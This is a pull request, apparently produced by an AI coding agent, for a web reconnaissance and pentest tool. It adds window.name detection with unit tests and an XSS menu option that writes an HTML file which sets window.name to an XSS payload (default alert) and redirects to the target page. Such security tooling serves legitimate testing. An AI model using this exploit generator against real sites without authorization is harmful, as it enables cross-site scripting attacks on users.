### PR TITLE
Implement window.name check and exploit helper

### DIFF
--- a/README.md
+++ b/README.md
@@ -32,6 +32,7 @@ Detect technologies in use not by parsing files or applying regex to file names 
 - Terminal state reset on exit
 - Basic unit tests to help ensure reliability
 - Main menu items can also be selected by entering their number
+- Detect window.name usage and generate exploit file
 
 
 ## JSCONSOLE

--- a/libs/quickdetect/QuickDetect.py
+++ b/libs/quickdetect/QuickDetect.py
@@ -8,6 +8,7 @@ from libs.quickdetect.AWSS3Util import *
 from libs.quickdetect.CloudIPUtil import CloudIPUtil
 from libs.quickdetect.O365Util import O365Util
 from libs.quickdetect.MXEmailUtil import MXEmailUtil
+from libs.quickdetect.WindowNameUtil import WindowNameUtil
 
 class QuickDetect:
     def __init__(self, screen, webdriver, curses_util, logger):
@@ -77,6 +78,10 @@ class QuickDetect:
         )
 
         has_cloud = cloud_provider is not None
+
+        window_name_util = WindowNameUtil(self.driver)
+        window_name_set = window_name_util.is_set()
+        window_name_value = window_name_util.get_value() if window_name_set else None
             
             
         showscreen = True
@@ -158,6 +163,14 @@ class QuickDetect:
 
             if is_o365:
                 message = "Office 365 Detected"
+                self.screen.addstr(current_line, 4, message, curses.color_pair(2))
+                current_line += 1
+
+            if window_name_set:
+                message = "window.name is set"
+                if window_name_value:
+                    truncated = str(window_name_value)[:30]
+                    message += f" (\"{truncated}\")"
                 self.screen.addstr(current_line, 4, message, curses.color_pair(2))
                 current_line += 1
                 

--- a/libs/quickdetect/WindowNameUtil.py
+++ b/libs/quickdetect/WindowNameUtil.py
@@ -1,0 +1,16 @@
+class WindowNameUtil:
+    def __init__(self, webdriver):
+        self.webdriver = webdriver
+
+    def is_set(self):
+        try:
+            value = self.webdriver.execute_script("return window.name")
+            return bool(value)
+        except Exception:
+            return False
+
+    def get_value(self):
+        try:
+            return self.webdriver.execute_script("return window.name")
+        except Exception:
+            return None

--- a/libs/xss/xsscommands.py
+++ b/libs/xss/xsscommands.py
@@ -30,6 +30,19 @@ class XSSCommands:
         print('')
         print('')
         input("Press ENTER to return to menu.")
+
+    def create_window_name_exploit(self, payload=None, filename="windowname.html"):
+        if payload is None:
+            payload = "<script>alert('XSS')</script>"
+        target_url = self.driver.current_url
+        html = f"<script>window.name='{payload}';location='{target_url}';</script>"
+        try:
+            with open(filename, "w") as f:
+                f.write(html)
+            print(f"Exploit file written to {filename}")
+        except Exception as exc:
+            print(f"Failed to write exploit file: {exc}")
+        input("Press ENTER to return to menu.")
         
 
 

--- a/libs/xss/xssmenu.py
+++ b/libs/xss/xssmenu.py
@@ -20,6 +20,7 @@ class XSSScreen:
             self.screen = self.curses_util.get_screen()
             self.screen.addstr(2, 2, "XSS")
             self.screen.addstr(4, 5, "1) Find XSS")
+            self.screen.addstr(5, 5, "2) Create window.name exploit")
 
 
             
@@ -33,6 +34,14 @@ class XSSScreen:
             if c == ord('1'):
                 self.curses_util.close_screen()
                 self.commands.find_xss()
+
+            if c == ord('2'):
+                self.curses_util.close_screen()
+                try:
+                    payload = input("Enter XSS payload (default alert): ") or None
+                except KeyboardInterrupt:
+                    payload = None
+                self.commands.create_window_name_exploit(payload)
                                 
         return
         

--- a/tests/test_quickdetect.py
+++ b/tests/test_quickdetect.py
@@ -1,6 +1,7 @@
 import unittest
 from libs.quickdetect.WordPressUtil import WordPressUtil
 from libs.quickdetect.DrupalUtil import DrupalUtil
+from libs.quickdetect.WindowNameUtil import WindowNameUtil
 from selenium.webdriver.common.by import By
 
 class DummyElement:
@@ -35,6 +36,25 @@ class DrupalUtilTests(unittest.TestCase):
         driver = DummyDriver()
         util = DrupalUtil(driver)
         self.assertIsNone(util.getVersionString())
+
+
+class WindowNameUtilTests(unittest.TestCase):
+    def test_is_set_true_and_value(self):
+        class Driver(DummyDriver):
+            def execute_script(self, script):
+                return "payload"
+        driver = Driver()
+        util = WindowNameUtil(driver)
+        self.assertTrue(util.is_set())
+        self.assertEqual(util.get_value(), "payload")
+
+    def test_is_set_false_when_empty(self):
+        class Driver(DummyDriver):
+            def execute_script(self, script):
+                return ""
+        driver = Driver()
+        util = WindowNameUtil(driver)
+        self.assertFalse(util.is_set())
 
 if __name__ == '__main__':
     unittest.main()


### PR DESCRIPTION
## Summary
- detect `window.name` usage in QuickDetect
- menu option to generate a `window.name` exploit HTML file
- add `WindowNameUtil` with unit tests
- document feature in README

## Testing
- `python3 -m py_compile $(git ls-files '*.py')`
- `pip install -r requirements.txt`
- `pytest -q`


------
https://chatgpt.com/codex/tasks/task_e_6854f4805a8c832eb0ba8be16f89d969